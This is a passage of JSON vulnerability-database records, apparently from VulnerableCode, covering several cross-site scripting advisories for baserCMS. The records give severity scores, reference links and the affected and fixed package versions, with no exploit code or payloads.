"MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/" } ], "url": "https://basercms.net/security/JVN_06274755" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995", "reference_id": "CVE-2024-46995", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46995" }, { "reference_url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv", "reference_id": "GHSA-mr7q-fv7j-jcgv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mr7q-fv7j-jcgv" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv", "reference_id": "GHSA-mr7q-fv7j-jcgv", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46995", "GHSA-mr7q-fv7j-jcgv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/110302?format=api", "vulnerability_id": "VCID-kmpp-6j49-pqfz", "summary": "baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability\nThere is a cross-site scripting vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.1 and earlier versions.\n\n### Vulnerability\nExecution of malicious JavaScript code may alter the display of the page or leak cookie information.\n- In Favorite registration (CVE-2022-39325)\n- In Permission Settings (CVE-2022-41994)\n- In User group management (CVE-2022-42486)\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\n### Credits\n- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.\n- YUYA KOTAKE@CARTA HOLDINGS, INC.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-39325", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00687", "scoring_system": "epss", "scoring_elements": "0.72163", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00687", "scoring_system": "epss", "scoring_elements": "0.72122", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-39325" }, { "reference_url": "https://basercms.net/security/JVN_53682526", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/" } ], "url": "https://basercms.net/security/JVN_53682526" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/" } ], "url": "https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39325", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39325" }, { "reference_url": "https://github.com/advisories/GHSA-395x-wv32-44v5", "reference_id": "GHSA-395x-wv32-44v5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-395x-wv32-44v5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/146599?format=api", "purl": "pkg:composer/baserproject/basercms@4.7.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-j37y-gws9-ake9" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zsgc-fnen-b7a6" }, { "vulnerability": "VCID-zxns-tzw3-27fr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2" } ], "aliases": [ "CVE-2022-39325", "GHSA-395x-wv32-44v5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56058?format=api", "vulnerability_id": "VCID-mfm9-gsh3-ubg8", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature\nXSS vulnerability in Blog posts feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01236", "scoring_system": "epss", "scoring_elements": "0.79576", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46996" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996", "reference_id": "CVE-2024-46996", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46996" }, { "reference_url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg", "reference_id": "GHSA-66jv-qrm3-vvfg", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-66jv-qrm3-vvfg" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg", "reference_id": "GHSA-66jv-qrm3-vvfg", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46996", "GHSA-66jv-qrm3-vvfg" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47109?format=api", "vulnerability_id": "VCID-nxrf-64er-xbfx", "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-26128", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.02281", "scoring_system": "epss", "scoring_elements": "0.85006", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-26128" }, { "reference_url": "https://basercms.net/security/JVN_73283159", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/" } ], "url": "https://basercms.net/security/JVN_73283159" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/" } ], "url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26128", "reference_id": "CVE-2024-26128", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26128" }, { "reference_url": "https://github.com/advisories/GHSA-jjxq-m8h3-4vw5", "reference_id": "GHSA-jjxq-m8h3-4vw5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jjxq-m8h3-4vw5" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5", "reference_id": "GHSA-jjxq-m8h3-4vw5", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69105?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9" } ], "aliases": [ "CVE-2024-26128", "GHSA-jjxq-m8h3-4vw5" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56065?format=api", "vulnerability_id": "VCID-p695-t9ye-v3ga", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature\nXSS vulnerability in Edit Email Form Settings Feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01064", "scoring_system": "epss", "scoring_elements": "0.7805", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46998" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://basercms.net/security/JVN_98693329", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/" } ], "url": "https://basercms.net/security/JVN_98693329" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998", "reference_id": "CVE-2024-46998", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46998" }, { "reference_url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x", "reference_id": "GHSA-p3m2-mj3j-j49x", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-p3m2-mj3j-j49x" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x", "reference_id": "GHSA-p3m2-mj3j-j49x", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "5.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46998", "GHSA-p3m2-mj3j-j49x" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46312?format=api", "vulnerability_id": "VCID-pd8c-9d7z-zkhg", "summary": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43647", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00572", "scoring_system": "epss", "scoring_elements": "0.69062", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43647" }, { "reference_url": "https://basercms.net/security/JVN_24381990", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/" } ], "url": "https://basercms.net/security/JVN_24381990" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/" } ], "url": "https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43647", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43647" }, { "reference_url": "https://github.com/advisories/GHSA-ggj4-78rm-6xgv", "reference_id": "GHSA-ggj4-78rm-6xgv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-ggj4-78rm-6xgv" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv", "reference_id": "GHSA-ggj4-78rm-6xgv", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api", "purl": "pkg:composer/baserproject/basercms@4.8.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/67580?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.0", "is_vulnerable": true, 